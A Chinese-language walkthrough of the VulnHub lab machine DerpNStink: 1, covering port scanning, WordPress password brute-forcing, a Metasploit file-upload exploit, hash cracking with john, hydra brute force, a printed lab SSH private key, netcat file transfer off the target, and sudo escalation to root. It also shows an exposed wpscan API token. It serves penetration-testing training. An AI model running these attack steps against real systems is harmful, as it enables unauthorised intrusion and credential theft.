0x01 靶机介绍
-
Name: DerpNStink: 1
-
Date release: 9 Feb 2018
-
Author: Bryan Smith
-
Series: DerpNStink
-
Difficulty : Medium
靶机下载地址:
https://www.vulnhub.com/entry/derpnstink-1,221/
0x02 侦查
端口探测
首先使用 nmap 进行端口扫描
nmap -p- -sV -sC -A 192.168.0.106 -oA nmap_DerpNStink-1
扫描结果显示目标开放了21、22、80端口。
80端口
访问
http://192.168.0.106
为一张图片
查看源代码并找到第一个flag:
flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)
同时找到一个路径文件
访问http://192.168.0.106/webnotes/info.txt
,出现提示要将更新本地DNS才能访问博客
目录扫描
使用 gobuster 进行目录扫描,成功找到目录temporary
、weblog
gobuster dir -u http://192.168.0.106 -w /usr/share/wordlists/dirb/big.txt -x php
访问http://192.168.0.106/temporary
页面如下
访问weblog
目录则自动跳转至http://derpnstink.local/weblog/
0x03 上线[stinky]
WordPress弱口令
对 hosts 文件进行修改完成域名解析
vim /etc/hosts
192.168.0.106 derpnstink.local
访问weblog
目录为博客界面
使用的博客模版为 WordPress
访问wp-admin
目录跳转至登录界面
使用 wpscan 进行漏洞扫描提示存在多个插件漏洞,其中的文件上传危害较大,但需要登录后台才能利用
wpscan --url http://derpnstink.local/weblog --api-token Rjr3NLjvRw21PbkmvY6h4EI1uqS5wB9lzCpPiLziH3A --detection-mode aggressive -e
使用 wpscan 对 admin 管理用户进行密码爆破,成功拿到密码admin
wpscan --url http://derpnstink.local/weblog --passwords /usr/share/wordlists/fasttrack.txt
通过弱口令admin/admin
登录管理后台
文件上传
由于插件slideshowgallery
存在文件上传漏洞,使用 MSF 进行漏洞利用
msfconsole
msf > use exploit/unix/webapp/wp_slideshowgallery_upload
msf > set rhosts derpnstink.local
msf > set targeturi /weblog
msf > set wp_user admin
msf > set wp_password admin
msf > run
成功返回 meterpreter 并查看目录信息
在/var/www/html/weblog
中找到配置文件wp-config.php
,其中存在数据库明文密码
同时在/var/www/html/php
中存在info.php
,文件注释提示存在 phpmyadmin
哈希破解
访问http://192.168.0.106/php/phpmyadmin/
并通过root/mysql
成功登录
在 wordpress 数据库的 wp_posts 表中发现flag2:
flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)
在 wp_users 用户表中发现另一个用户 unclestinky,同时存在密码哈希
使用 john 对其哈希值进行爆破,成功拿到密码为wedgie57
echo '$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41' > pass.hash
john pass.hash --wordlist=/usr/share/wordlists/rockyou.txt
john pass.hash --show
同时查看系统用户,发现用户 stinky 与 mrderp
cat /etc/passwd | grep /bin/bash
密码爆破
使用 hydra 以上述用户为字典爆破 FTP 和 SSH 服务,成功在 FTP 服务中发现账号密码stinky/wedgie57
hydra -L user.txt -p wedgie57 192.168.0.106 ssh -f -V
hydra -L user.txt -p wedgie57 192.168.0.106 ftp -f -V
成功登录 FTP 服务
在其中找到 SSH 私钥:
ftp://192.168.0.106/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/key.txt
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwSaN1OE76mjt64fOpAbKnFyikjz4yV8qYUxki+MjiRPqtDo4
2xba3Oo78y82svuAHBm6YScUos8dHUCTMLA+ogsmoDaJFghZEtQXugP8flgSk9cO
uJzOt9ih/MPmkjzfvDL9oW2Nh1XIctVfTZ6o8ZeJI8Sxh8Eguh+dw69M+Ad0Dimn
AKDPdL7z7SeWg1BJ1q/oIAtJnv7yJz2iMbZ6xOj6/ZDE/2trrrdbSyMc5CyA09/f
5xZ9f1ofSYhiCQ+dp9CTgH/JpKmdsZ21Uus8cbeGk1WpT6B+D8zoNgRxmO3/VyVB
LHXaio3hmxshttdFp4bFc3foTTSyJobGoFX+ewIDAQABAoIBACESDdS2H8EZ6Cqc
nRfehdBR2A/72oj3/1SbdNeys0HkJBppoZR5jE2o2Uzg95ebkiq9iPjbbSAXICAD
D3CVrJOoHxvtWnloQoADynAyAIhNYhjoCIA5cPdvYwTZMeA2BgS+IkkCbeoPGPv4
ZpHuqXR8AqIaKl9ZBNZ5VVTM7fvFVl5afN5eWIZlOTDf++VSDedtR7nL2ggzacNk
Q8JCK9mF62wiIHK5Zjs1lns4Ii2kPw+qObdYoaiFnexucvkMSFD7VAdfFUECQIyq
YVbsp5tec2N4HdhK/B0V8D4+6u9OuoiDFqbdJJWLFQ55e6kspIWQxM/j6PRGQhL0
DeZCLQECgYEA9qUoeblEro6ICqvcrye0ram38XmxAhVIPM7g5QXh58YdB1D6sq6X
VGGEaLxypnUbbDnJQ92Do0AtvqCTBx4VnoMNisce++7IyfTSygbZR8LscZQ51ciu
Qkowz3yp8XMyMw+YkEV5nAw9a4puiecg79rH9WSr4A/XMwHcJ2swloECgYEAyHn7
VNG/Nrc4/yeTqfrxzDBdHm+y9nowlWL+PQim9z+j78tlWX/9P8h98gOlADEvOZvc
fh1eW0gE4DDyRBeYetBytFc0kzZbcQtd7042/oPmpbW55lzKBnnXkO3BI2bgU9Br
7QTsJlcUybZ0MVwgs+Go1Xj7PRisxMSRx8mHbvsCgYBxyLulfBz9Um/cTHDgtTab
L0LWucc5KMxMkTwbK92N6U2XBHrDV9wkZ2CIWPejZz8hbH83Ocfy1jbETJvHms9q
cxcaQMZAf2ZOFQ3xebtfacNemn0b7RrHJibicaaM5xHvkHBXjlWN8e+b3x8jq2b8
gDfjM3A/S8+Bjogb/01JAKBgGfUvbY9eBKHrO6B+fnEre06c1ArO/5qZLVKczD7
RTazcF3m81P6dRjO52QsPQ4vay0kK3vqDA+s6lGPKDraGbAqO+5paCKCubN/1qP1
14fUmuXijCjikAPwoRQ//5MtWiwuu2cj8Ice/PZIGD/kXk+sJXyCz2TiXcD/qh1W
pF13AoGBAJG43weOx9gyy1Bo64cBtZ7iPJ9doiZ5Y6UWYNxy3/f2wZ37D99NSndz
UBtPqkw0sAptqkjKeNtLCYtHNFJAnE0/uAGoAyX+SHhas0l2IYlUlk8AttcHP1kA
a4Id4FlCiJAXl3/ayyrUghuWWA3jMW3JgZdMyhU3OV+wyZz25S8o
-----END RSA PRIVATE KEY-----
SSH私钥登录
赋予400权限后使用该私钥登录目标 SSH 服务
chomd 400 key.txt
ssh -i key.txt stinky@192.168.0.106
在~/Desktop
目录中找到第三个flag:
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
0x04 权限提升[root]
流量分析
在Document
目录下发现一个 pcap 文件,尝试将其下载至本地,首先开启 nc 监听
nc -nvlp 1234 > derpissues.pcap
在目标 shell 中传输文件
nc 192.168.0.103 1234 < derpissues.pcap
打开 WireShark 分析文件,在其中存在三个用户登录数据包,发现 mrderp 密码为 derpderpderpderpderpderpderp
sudo提权
成功登录用户 mrderp 并查看用户权限,发现在/home/mrdrep/binaries
目录中运行所有以 derpy 开头的文件都将以 root 权限执行
sudo -l
创建binaries
目录以及用户提权的脚本
mkdir binaries
cd binaries
nano derpy123.sh
脚本内容如下
bash -i
利用 sudo 执行成功拿到 root 权限
chomd +x derpy123.sh
sudo ./derpy123.sh
在/root/Desktop
下成功拿到第四个flag
0x05 知识星球
原文始发于微信公众号(狐狸说安全):Vulnhub DerpNStink: 1
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论